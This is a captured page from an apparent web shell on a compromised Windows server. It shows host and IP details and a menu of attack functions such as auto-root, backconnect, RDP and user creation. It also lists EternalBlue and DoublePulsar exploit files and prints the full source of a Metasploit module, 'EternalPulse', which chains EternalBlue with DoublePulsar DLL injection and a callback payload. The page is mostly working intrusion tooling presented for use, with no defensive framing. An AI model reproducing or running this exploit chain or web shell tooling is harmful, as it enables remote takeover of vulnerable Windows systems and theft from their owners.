Windows NT SRV-DATA 6.3 build 9600 (Windows Server 2012 R2 Standard Edition) AMD64
Apache/2.4.54 (Win64) OpenSSL/1.1.1p PHP/8.2.0
: 192.168.213.201 | : 216.73.216.102
Cant Read [ /etc/named.conf ]
8.2.0
ADMINISTRATEUR
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
[ C ]
[ E ]
[ Z ]
C: /
Users /
admin /
Desktop /
EternalPulse-master /
[ HOME SHELL ]
Name
Size
Permission
Action
Doublepulsar-1.3.1.Skeleton.xm...
4.39
KB
-rw-rw-rw-
Doublepulsar-1.3.1.exe
44.5
KB
-rwxrwxrwx
Doublepulsar-1.3.1.xml
4.37
KB
-rw-rw-rw-
EternalPulse
2.86
KB
-rw-rw-rw-
Eternalblue-2.2.0.Skeleton.xml
2.79
KB
-rw-rw-rw-
Eternalblue-2.2.0.exe
126
KB
-rwxrwxrwx
Eternalblue-2.2.0.xml
2.78
KB
-rw-rw-rw-
README.md
51
B
-rw-rw-rw-
_pytrch.pyd
150
KB
-rw-rw-rw-
adfw-2.dll
14.5
KB
-rw-rw-rw-
adfw.dll
11
KB
-rw-rw-rw-
cnli-0.dll
104
KB
-rw-rw-rw-
cnli-1.dll
98.5
KB
-rw-rw-rw-
coli-0.dll
15
KB
-rw-rw-rw-
crli-0.dll
17
KB
-rw-rw-rw-
dmgd-1.dll
34.5
KB
-rw-rw-rw-
dmgd-4.dll
468.5
KB
-rw-rw-rw-
esco-0.dll
13.5
KB
-rw-rw-rw-
eternalpulse.rb
4.73
KB
-rw-rw-rw-
exma-1.dll
10
KB
-rw-rw-rw-
exma.dll
6
KB
-rw-rw-rw-
iconv.dll
21.5
KB
-rw-rw-rw-
libcurl.dll
207.5
KB
-rw-rw-rw-
libeay32.dll
882
KB
-rw-rw-rw-
libiconv-2.dll
947.65
KB
-rw-rw-rw-
libxml2.dll
807
KB
-rw-rw-rw-
pcla-0.dll
329.5
KB
-rw-rw-rw-
pcre-0.dll
143
KB
-rw-rw-rw-
pcrecpp-0.dll
32
KB
-rw-rw-rw-
pcreposix-0.dll
9.5
KB
-rw-rw-rw-
posh-0.dll
11
KB
-rw-rw-rw-
posh.dll
6.5
KB
-rw-rw-rw-
pytrch.py
37.31
KB
-rw-rw-rw-
pytrch.pyc
56.5
KB
-rw-rw-rw-
riar-2.dll
32
KB
-rw-rw-rw-
riar.dll
16
KB
-rw-rw-rw-
ssleay32.dll
180
KB
-rw-rw-rw-
tibe-1.dll
228
KB
-rw-rw-rw-
tibe-2.dll
232
KB
-rw-rw-rw-
tibe.dll
264
KB
-rw-rw-rw-
trch-0.dll
72
KB
-rw-rw-rw-
trch-1.dll
58.5
KB
-rw-rw-rw-
trch.dll
48.5
KB
-rw-rw-rw-
trfo-0.dll
44
KB
-rw-rw-rw-
trfo-2.dll
29
KB
-rw-rw-rw-
trfo.dll
37.5
KB
-rw-rw-rw-
tucl-1.dll
9
KB
-rw-rw-rw-
tucl.dll
6
KB
-rw-rw-rw-
ucl.dll
57
KB
-rw-rw-rw-
xdvl-0.dll
31.5
KB
-rw-rw-rw-
zibe.dll
256
KB
-rw-rw-rw-
zlib1.dll
59
KB
-rw-rw-rw-
Delete
Unzip
Zip
${this.title}
Close
Code Editor : eternalpulse.rb
require 'msf/core' class MetasploitModule < Msf::Exploit::Remote #include Msf::Exploit::Remote::DCERPC include Msf::Exploit::Remote::SMB::Client def initialize(info = {}) super(update_info(info, 'Name' => 'EternalPulse', 'Description' => %q{ ISAK - INSIGNIA SWISS ARMY KNIFE. EternalBlue and DoublePulse Exploit in ruby. ** NSA EXPLOITS, MADE SIMPLE'S ** }, 'Author' => [ 'I.N.S.I.G.N.I.A', 'Author: A (@DavidOfficiel)' ], 'Payload' => { 'BadChars' => "\x00\x0a\x0d", }, 'Platform' => 'win', 'DefaultTarget' => 8, 'Targets' => [ ['Windows XP (all services pack) (x86) (x64)',{}], ['Windows Server 2003 SP0 (x86)',{}], ['Windows Server 2003 SP1/SP2 (x86)',{}], ['Windows Server 2003 (x64)',{}], ['Windows Vista (x86)',{}], ['Windows Vista (x64)',{}], ['Windows Server 2008 (x86) ',{}], ['Windows Server 2008 R2 (x86) (x64)',{}], ['Windows 7 (all services pack) (x86) (x64)',{}] ], 'Arch' => [ARCH_X86,ARCH_X64], 'ExitFunc' => 'thread', 'Target' => 0, 'License' => MSF_LICENSE, ) ) register_options([ OptEnum.new('TARGETARCHITECTURE', [true,'Target Architecture','x86',['x86','x64']]), OptString.new('ETERNALBLUEPATH',[true,'Path directory of Eternalblue','.msf4/modules/exploits/isak/modules/']), OptString.new('DOUBLEPULSARPATH',[true,'Path directory of Doublepulsar','.msf4/modules/exploits/isak/modules/']), OptString.new('WINEPATH',[true,'WINE drive_c path','/root/.wine/drive_c/']), OptString.new('PROCESSINJECT',[true,'Name of process to inject into (Change to lsass.exe for x64)','wlms.exe']) ], self.class) register_advanced_options([ OptInt.new('TimeOut',[false,'Timeout for blocking network calls (in seconds)',60]), OptString.new('DLLName',[true,'DLL name for Doublepulsar','eternal11.dll']) ], self.class) end def exploit #Custom XML Eternalblue print_status('Generating Eternalblue XML data') cp = `cp #{datastore['ETERNALBLUEPATH']}/Eternalblue-2.2.0.Skeleton.xml #{datastore['ETERNALBLUEPATH']}/Eternalblue-2.2.0.xml` sed = `sed -i 's/%RHOST%/#{datastore['RHOST']}/' #{datastore['ETERNALBLUEPATH']}/Eternalblue-2.2.0.xml` sed = `sed -i 's/%RPORT%/#{datastore['RPORT']}/' #{datastore['ETERNALBLUEPATH']}/Eternalblue-2.2.0.xml` sed = `sed -i 's/%TIMEOUT%/#{datastore['TIMEOUT']}/' #{datastore['ETERNALBLUEPATH']}/Eternalblue-2.2.0.xml` #WIN72K8R2 (4-8) and XP (0-3) if target.name =~ /7|2008|Vista/ objective = "WIN72K8R2" else objective = "XP" end sed = `sed -i 's/%TARGET%/#{objective}/' #{datastore['ETERNALBLUEPATH']}/Eternalblue-2.2.0.xml` #Custom XML Doublepulsar print_status('Generating Doublepulsar XML data') cp = `cp #{datastore['DOUBLEPULSARPATH']}/Doublepulsar-1.3.1.Skeleton.xml #{datastore['DOUBLEPULSARPATH']}/Doublepulsar-1.3.1.xml` sed = `sed -i 's/%RHOST%/#{datastore['RHOST']}/' #{datastore['DOUBLEPULSARPATH']}/Doublepulsar-1.3.1.xml` sed = `sed -i 's/%RPORT%/#{datastore['RPORT']}/' #{datastore['DOUBLEPULSARPATH']}/Doublepulsar-1.3.1.xml` sed = `sed -i 's/%TIMEOUT%/#{datastore['TIMEOUT']}/' #{datastore['DOUBLEPULSARPATH']}/Doublepulsar-1.3.1.xml` sed = `sed -i 's/%TARGETARCHITECTURE%/#{datastore['TARGETARCHITECTURE']}/' #{datastore['DOUBLEPULSARPATH']}/Doublepulsar-1.3.1.xml` dllpayload = datastore['WINEPATH'] + datastore['DLLName'] dllpayload2 = dllpayload.gsub('/','\/') sed = `sed -i 's/%DLLPAY%/#{dllpayload2}/' #{datastore['DOUBLEPULSARPATH']}/Doublepulsar-1.3.1.xml` sed = `sed -i 's/%PROCESSINJECT%/#{datastore['PROCESSINJECT']}/' #{datastore['DOUBLEPULSARPATH']}/Doublepulsar-1.3.1.xml` #Generate DLL print_status("Generating payload DLL for Doublepulsar") pay = framework.modules.create(datastore['payload']) pay.datastore['LHOST'] = datastore['LHOST'] dll = pay.generate_simple({'Format'=>'dll'}) File.open(datastore['WINEPATH']+datastore['DLLName'],'w') do |f| print_status("Writing DLL in #{dllpayload}") f.print dll end #Send Exploit + Payload Injection print_status('Launching Eternalblue...') output = `cd #{datastore['ETERNALBLUEPATH']}; wine Eternalblue-2.2.0.exe` if output =~ /=-=-WIN-=-=/ print_good("Pwned! Eternalblue success!") elsif output =~ /Backdoor returned code: 10 - Success!/ print_good("Backdoor is already installed") else print_error("Are you sure it's vulnerable?") end print_status('Launching Doublepulsar...') output2 = `cd #{datastore['DOUBLEPULSARPATH']}; wine Doublepulsar-1.3.1.exe` if output2 =~ /Backdoor returned code: 10 - Success!/ print_good("Remote code executed... 3... 2... 1...") else print_error("Oops, something was wrong!") end handler end end
Close